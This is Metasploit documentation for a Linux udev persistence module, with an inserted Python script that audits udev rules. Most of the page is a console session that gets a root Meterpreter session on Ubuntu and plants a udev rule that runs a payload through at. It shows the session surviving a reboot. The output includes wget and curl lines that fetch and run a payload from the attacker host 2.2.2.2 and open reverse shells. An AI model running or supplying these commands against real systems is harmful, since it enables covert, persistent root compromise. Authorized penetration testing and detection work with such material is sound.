
Udev

documentation/modules/exploit/linux/persistence/udev.md


Vulnerable Application

This is a post module that installs persistence on a Linux system using udev. The persistence payload will be triggered with root privileges every time a network interface other than lo comes up. Execution is triggered through the at command, so at must be installed on the target.
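For defenders, the mechanism described above leaves a rules file that can be audited. The following is an added example, not code from the module or the Metasploit project: it flags net-subsystem udev rules whose RUN key invokes a job scheduler such as at, or a program outside the usual helper directories. The trusted-prefix list, the function names and the sample rules are assumptions constructed for illustration.

```python
import re
from pathlib import Path

# Directories udev reads rules from (udev(7)); the module's UDEV_PATH defaults to the first.
RULE_DIRS = ["/lib/udev/rules.d", "/usr/lib/udev/rules.d", "/etc/udev/rules.d", "/run/udev/rules.d"]
# Assumption: packaged rules normally call helpers under these prefixes only.
TRUSTED_PREFIXES = ("/lib/udev/", "/usr/lib/udev/", "/usr/lib/systemd/", "/lib/systemd/")
SCHEDULERS = {"at", "batch"}  # schedulers that detach a job from the udev worker
RUN_RE = re.compile(r'RUN(?:\{[a-z]+\})?\s*\+?=\s*"([^"]*)"')
NET_RE = re.compile(r'SUBSYSTEM\s*==\s*"net"')

def logical_lines(text):
    """Join backslash-continued lines, then drop comments and blank lines."""
    joined = re.sub(r"\\\n", " ", text)
    return [l.strip() for l in joined.splitlines() if l.strip() and not l.lstrip().startswith("#")]

def audit_rules(text):
    """Return (reason, rule) findings for net-subsystem rules with a suspicious RUN command."""
    findings = []
    for rule in logical_lines(text):
        if not NET_RE.search(rule):
            continue
        for cmd in RUN_RE.findall(rule):
            prog = (cmd.split() or [""])[0]
            if Path(prog).name in SCHEDULERS:
                findings.append(("scheduler-in-RUN", rule))
            elif prog.startswith("/") and not prog.startswith(TRUSTED_PREFIXES):
                findings.append(("untrusted-path-in-RUN", rule))
    return findings

def audit_host(dirs=RULE_DIRS):
    """Scan the local rules directories; returns {rules file path: findings}."""
    out = {}
    for d in dirs:
        for f in sorted(Path(d).glob("*.rules")):
            hits = audit_rules(f.read_text(errors="replace"))
            if hits:
                out[str(f)] = hits
    return out

# Constructed sample input (not taken from the module): one benign rule, one suspicious rule.
SAMPLE = '''# constructed example
SUBSYSTEM=="net", ACTION=="add", RUN+="/usr/lib/systemd/systemd-sysctl --prefix=/net/ipv4/conf/$name"
SUBSYSTEM=="net", KERNEL!="lo", RUN+="/usr/bin/at -f /opt/example_payload now"
'''
if __name__ == "__main__":
    for reason, rule in audit_rules(SAMPLE):
        print(reason, "::", rule)
```

Calling `audit_host()` on a live system scans the real rules directories; a finding is a lead to review against the package manager's file ownership, not proof of compromise.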

Verification Steps

  1. Start msfconsole
  2. Obtain a root session on the target machine
  3. use exploit/linux/persistence/udev
  4. set session -1
  5. exploit

Options

PAYLOAD_NAME

Name of the payload file to write. Defaults to random.

UDEV_PATH

Path to udev rules folder. Defaults to /lib/udev/rules.d/

UDEV_RULE

Rule name for udev. Defaults to random.

Scenarios

Module usage

Ubuntu 24.04

Initial shell

resource (/root/.msf4/msfconsole.rc)> setg verbose true
verbose => true
resource (/root/.msf4/msfconsole.rc)> setg lhost 2.2.2.2
lhost => 2.2.2.2
resource (/root/.msf4/msfconsole.rc)> setg payload cmd/linux/http/x64/meterpreter/reverse_tcp
payload => cmd/linux/http/x64/meterpreter/reverse_tcp
resource (/root/.msf4/msfconsole.rc)> use exploit/multi/script/web_delivery
[*] Using configured payload cmd/linux/http/x64/meterpreter/reverse_tcp
resource (/root/.msf4/msfconsole.rc)> set target 7
target => 7
resource (/root/.msf4/msfconsole.rc)> set srvport 8082
srvport => 8082
resource (/root/.msf4/msfconsole.rc)> set uripath l
uripath => l
resource (/root/.msf4/msfconsole.rc)> set payload payload/linux/x64/meterpreter/reverse_tcp
payload => linux/x64/meterpreter/reverse_tcp
resource (/root/.msf4/msfconsole.rc)> set lport 4446
lport => 4446
resource (/root/.msf4/msfconsole.rc)> run
[*] Exploit running as background job 0.
[*] Exploit completed, but no session was created.
[*] Started reverse TCP handler on 2.2.2.2:4446 
[*] Using URL: http://2.2.2.2:8082/l
[*] Server started.
[*] Run the following command on the target machine:
wget -qO Qjdo0XSK --no-check-certificate http://2.2.2.2:8082/l; chmod +x Qjdo0XSK; ./Qjdo0XSK& disown
msf exploit(multi/script/web_delivery) > 
[*] 1.1.1.1    web_delivery - Delivering Payload (250 bytes)
[*] Transmitting intermediate stager...(126 bytes)
[*] Sending stage (3090404 bytes) to 1.1.1.1
[*] Meterpreter session 1 opened (2.2.2.2:4446 -> 1.1.1.1:43842) at 2025-12-20 16:24:02 -0500

msf exploit(multi/script/web_delivery) > sessions -i 1
[*] Starting interaction with 1...

meterpreter > getuid
Server username: root
meterpreter > sysinfo
Computer     : 1.1.1.1
OS           : Ubuntu 24.04 (Linux 6.8.0-31-generic)
Architecture : x64
BuildTuple   : x86_64-linux-musl
Meterpreter  : x64/linux
meterpreter > background
[*] Backgrounding session 1...

Persistence install

msf exploit(multi/script/web_delivery) > use exploit/linux/persistence/udev 
[*] Using configured payload cmd/linux/http/x64/meterpreter/reverse_tcp
msf exploit(linux/persistence/udev) > set session 1
session => 1
msf exploit(linux/persistence/udev) > set WritableDir /opt/
WritableDir => /opt/
msf exploit(linux/persistence/udev) > exploit
[*] Command to run on remote host: curl -so ./eULGakHgwKeL http://2.2.2.2:8080/t70WmtC4mNeBieRpZqn09Q;chmod +x ./eULGakHgwKeL;./eULGakHgwKeL&
[*] Exploit running as background job 1.
[*] Exploit completed, but no session was created.

[*] Fetch handler listening on 2.2.2.2:8080
[*] HTTP server started
[*] Adding resource /t70WmtC4mNeBieRpZqn09Q
[*] Started reverse TCP handler on 2.2.2.2:4444 
msf exploit(linux/persistence/udev) > [*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable. likely exploitable
[*] Writing '/opt//Z7CpOCzhzq' (271 bytes) ...
[+] /opt//Z7CpOCzhzq written
[+] /lib/udev/rules.d//41-EInB5urA.rules written
[*] Triggering udev rule
[*] Meterpreter-compatible Cleanup RC file: /root/.msf4/logs/persistence/1.1.1.1_20251220.5601/1.1.1.1_20251220.5601.rc
[*] Client 1.1.1.1 requested /t70WmtC4mNeBieRpZqn09Q
[*] Sending payload to 1.1.1.1 (curl/8.5.0)
[*] Transmitting intermediate stager...(126 bytes)
[*] Sending stage (3090404 bytes) to 1.1.1.1
[*] Meterpreter session 2 opened (2.2.2.2:4444 -> 1.1.1.1:38100) at 2025-12-20 16:56:03 -0500

Trigger a reboot to test the persistence

msf exploit(linux/persistence/udev) > sessions -i 1
[*] Starting interaction with 1...

meterpreter > shell
Process 1394 created.
Channel 8 created.
reboot

[*] 1.1.1.1 - Meterpreter session 1 closed.  Reason: Died


Terminate channel 8? [y/N]  y
[-] Send timed out. Timeout currently 15 seconds, you can configure this with sessions --interact <id> --timeout <value>
msf exploit(linux/persistence/udev) > 
[*] Client 1.1.1.1 requested /t70WmtC4mNeBieRpZqn09Q
[*] Sending payload to 1.1.1.1 (curl/8.5.0)
[*] Transmitting intermediate stager...(126 bytes)
[*] Sending stage (3090404 bytes) to 1.1.1.1
[*] Meterpreter session 3 opened (2.2.2.2:4444 -> 1.1.1.1:35550) at 2025-12-20 16:56:38 -0500
[*] 1.1.1.1 - Meterpreter session 2 closed.  Reason: Died

msf exploit(linux/persistence/udev) > sessions -i 3
[*] Starting interaction with 3...

meterpreter > getuid
Server username: root
meterpreter >